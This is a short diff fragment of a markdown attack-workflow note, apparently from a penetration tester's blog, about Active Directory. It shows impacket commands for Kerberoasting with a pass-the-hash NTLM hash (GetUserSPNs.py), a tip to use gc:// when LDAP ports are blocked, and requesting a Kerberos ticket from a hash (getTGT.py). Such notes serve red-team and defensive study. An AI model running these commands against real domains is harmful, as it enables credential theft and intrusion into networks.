l0wc0ster/blog/ad_workflow.md

 python GetUserSPNs.py -hashes :NTLM -request -target-domain jaki.local jaki.local/someuser
 ```

+if ldap/ldaps ports are blocked but gc port 3268 is accessible - just fix ldap:// protocol to gc:// in impacket.
-if it is forbidden to use NTLM authorization in the domain, use Kerberos authorization:
+If it is forbidden to use NTLM authorization in the domain, use Kerberos authorization:

 ```
 getTGT.py jaki.local/someuser -hashes :NTLM -dc-ip 10.10.1.1